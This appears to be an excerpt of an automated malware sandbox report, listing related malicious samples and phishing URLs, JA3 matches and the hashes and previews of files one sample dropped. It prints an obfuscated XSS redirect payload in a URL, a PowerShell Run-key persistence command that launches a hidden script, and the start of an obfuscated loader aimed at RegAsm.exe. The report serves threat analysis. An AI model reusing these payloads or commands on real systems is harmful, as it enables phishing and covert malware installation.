	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	5.254.217.95
	Requerimiento_Juridico_Proferido_N#U00b0_437361838..exe	Get hash	malicious	AsyncRAT, DcRat	Browse	46.246.80.9
CLOUDFLARENETUS	http://www.hostmaster.amera.co.uk/images.php?p=177058987739%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%2Fva%27%2C%27ult%27%2C%27dor%27%2C%27es.co%27%2C%27m%2F0%2F0%27%2C%27%2F0%2Fd%27%2C%2715a%27%2C%27d8%27%2C%27213%27%2C%277d5%27%2C%277d0%27%2C%278b%27%2C%27747%27%2C%27555%27%2C%27ec3%27%2C%277%27%2C%27539%27%2C%27e6/13/387-16277/1278-492099-29626%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E#g92s2SFa9QJuB2UtlN4C	Get hash	malicious	Phisher	Browse	104.21.61.175
	http://icmtg.com	Get hash	malicious	Unknown	Browse	104.22.1.204
	http://getcloudapp.com	Get hash	malicious	Unknown	Browse	172.64.150.44
	https://www.ringaraja.net/portleti/katalogponudnikov/result.asp?id=4336&s=&t=51&p=50&url=//form.jotform.com/Maka_Cro/antibot-protectionyrhifhwrfhguhewrg	Get hash	malicious	HTMLPhisher	Browse	104.22.72.81
	SecuriteInfo.com.Win32.PWSX-gen.14983.3693.exe	Get hash	malicious	LummaC	Browse	104.21.51.224
	Audio playback00_05-30-00000.html	Get hash	malicious	HTMLPhisher	Browse	172.64.151.101
	http://trello.com/c/VmtGBtm4	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	https://www.google.com/url?q=3oMRWXBzxXkuhasVZOBU8evdsHOSozuoMRWXBzxXkuhasVZOBU8evdsDz3yh&rct=tTPSoMRWXBzxXkuhasVZOBU8evdsFX0oMRWXBzxXkuhasVZOBU8evdsjkXyycT&sa=t&url=amp%2F%70%72%6F%6A%65%74%6F%70%6C%75%73%73%69%7A%65%2E%63%6F%6D%2E%62%72%2F%69%61%6D%67%65%73%32%2F%2FoMRWXBzxXkuhasVZOBU8evds/oMRWXBzxXkuhasVZOBU8evds/amdpbGxAY2VlbnRhLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).js	Get hash	malicious	GookitLoader	Browse	104.21.68.103
	are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).js	Get hash	malicious	GookitLoader	Browse	172.67.156.7

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	http://www.hostmaster.amera.co.uk/images.php?p=177058987739%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%2Fva%27%2C%27ult%27%2C%27dor%27%2C%27es.co%27%2C%27m%2F0%2F0%27%2C%27%2F0%2Fd%27%2C%2715a%27%2C%27d8%27%2C%27213%27%2C%277d5%27%2C%277d0%27%2C%278b%27%2C%27747%27%2C%27555%27%2C%27ec3%27%2C%277%27%2C%27539%27%2C%27e6/13/387-16277/1278-492099-29626%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E#g92s2SFa9QJuB2UtlN4C	Get hash	malicious	Phisher	Browse	76.76.21.22 104.20.4.235
	are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).js	Get hash	malicious	GookitLoader	Browse	76.76.21.22 104.20.4.235
	are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).js	Get hash	malicious	GookitLoader	Browse	76.76.21.22 104.20.4.235
	https://dev-skbfc.pantheonsite.io/wp-content/plugins/z-downloads/	Get hash	malicious	Unknown	Browse	76.76.21.22 104.20.4.235
	https://w-vipps.pl/	Get hash	malicious	Unknown	Browse	76.76.21.22 104.20.4.235
	https://a-e0d81e.ingress-earth.ewp.live/wp-content/plugins/12/paiement.php	Get hash	malicious	Unknown	Browse	76.76.21.22 104.20.4.235
	http://telegram.ins-kro.org/	Get hash	malicious	Unknown	Browse	76.76.21.22 104.20.4.235
	LUYYSwStKN.ps1	Get hash	malicious	XWorm	Browse	76.76.21.22 104.20.4.235
	cFvDKWB1V8.ps1	Get hash	malicious	XWorm	Browse	76.76.21.22 104.20.4.235
	670un9Ls5U.vbs	Get hash	malicious	XWorm	Browse	76.76.21.22 104.20.4.235

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.356499146491567
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAv:MLU84jE4K5E4KO
MD5:	DD76058F7DDB0EF40EF99C0B50089985
SHA1:	AE93EF979AC4E0B61938E023CB6B3DE841653BD8
SHA-256:	E4A1D5B6454DF5E72015FFE84752994AB1577A96E8C78054A65F555A0A049843
SHA-512:	F68F7C437C564FFD7F5F754B908D46BC1815C1C58AD17198AF4FD49DFB2AD8C71C066B95B7A68C73B198EF4F4BE8A78E9883E05D8A5816F210979FE8C447FD5D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (337), with no line terminators
Category:	dropped
Size (bytes):	337
Entropy (8bit):	5.165829706141399
Encrypted:	false
SSDEEP:	6:sDuwZH1j0IQHjo5g1oTrcsny1R3KbQO0cbENjAu923oH+B2KZmI54645NHRn:sVVj0pNsngkbQpcVrYe1KP7
MD5:	0B9F8BC562B16DDAF49601456EB19C64
SHA1:	1C6C8E31007C4FB9F56E94FC5833E6433B7EF4B2
SHA-256:	590ACE7E908A995BC5E5C8E4BF6AE8B9E0E0320BF3A1F8FC2005559851A0D633
SHA-512:	E845D9D777345B449B792FC2789086C47415FD091622C550E7A44BBFFFE04436E564A2299079CA256779A7A24BD776D55977DCB06F6D7EDA8940E83A29B7D377
Malicious:	false
Preview:	New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Update Drivers NVIDEO_nyj" -Value "cmd.exe /c start /min `"`" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman `". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' `";exit" -PropertyType "String" -force ; exit

C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (32656)
Category:	dropped
Size (bytes):	255248
Entropy (8bit):	2.9997049187293987
Encrypted:	false
SSDEEP:	1536:l1vKYrQMaxsA0Au+JGCCkthtwDs+7TS2I5pzFme43l6+7Pua:l1zOeCCkthtwoU22AppmeWlBPua
MD5:	044A14E34D8F839CB0787154259B7375
SHA1:	9E73BE641015A80700271E8E43634FA448D21E66
SHA-256:	DFF99CD215C9FFE66E2786E61A20B6648CFF0FAA1D4FF65548D87B0E422E2756
SHA-512:	A075963D0C1F913A1C7C7CE2A4B591D2B26A0FECDA93DD2C8E0D0B58746667B4291F614F9D8D5912C2201826C9FDF752661750797F886F9DEE44577327704FE3
Malicious:	true
Preview:	..$.d.q.s.x.B. .=. .'.C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.'. .+. .'.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.'. .+. .'.R.e.g.A.s.m...e.x.e.'.;.....$.f.V.L.F.U. .=. .'..!:..!'.;...$.j.u.N.m.Q. .=. .'.A.'.;.....$.W.Y.v.t.t. .=. .'.T.V.q.Q..!:..!.!:..!M..!:..!.!:..!.!:..!.!:..!E..!:..!.!:..!.!:..!.!:..!/./.8..!:..!.!:..!L.g..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!Q..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!g..!:..!.!:..!.!:..!.!:..!.!:..!4.f.u.g.4..!:..!t..!:..!n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!B.Q.R.Q..!:..!.!:..!T..!:..!E.D..!:..!G.G.g.7.G.Y..!:..!.!:..!.!:..!.!:..!.!:..!

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulx51ll/h:NllU
MD5:	4293FEE5C8B10DA4F196BB8D3E9677AB
SHA1:	24B4682AEF78CE9FB08A31ED9066B9DA4B2813C9
SHA-256:	95B52E61F9A560203DDC32DD3B80645D3E540FF7BF94D05646CA1EA6350E6858
SHA-512:	262068B072CBE50C506DB5F470C95DA12CC25D7C972DC34290BCCF455508916D1282C733A0F5F7AAF84442786742D5A8512B7095DCA07C177A4318FC1A2FA3B6
Malicious:	false
Preview:	@...e................................. ..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yfh01gy.ai5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tztvill.0jl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxgckrry.o3r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2w31zvg.f1g.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcu2olee.gyi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4dzadck.eq4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egqs2cvs.fio.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esimclt3.okc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gv02y0bp.y5b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3laic2k.a2s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2xvaybo.sc4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lukmjau4.e1u.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nafty4e2.uoa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nepsepwb.bqm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooy0ctyb.fre.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opweeao4.b1e.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pginevyz.koj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcyk52g3.3bj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk3gefbd.wmb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqmp5iao.ojc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.711704485190179
Encrypted:	false
SSDEEP:	48:JS65LCmbU2K+DaukvhkvklCyw6n2kCXosElzISogZoBECXosElIISogZoV1:c8LCTonkvhkvCCt2CXosE7HRCXosECHi
MD5:	C33E4787669FDEB082B64C7A521F18B7
SHA1:	2C4E1BA17ADCC8A9CC430CAD8E47BC5A6C05BE32
SHA-256:	A064ED19A842EDA977FBE8319D2E4CF121F2587E29F001D54F10E77575D79E06
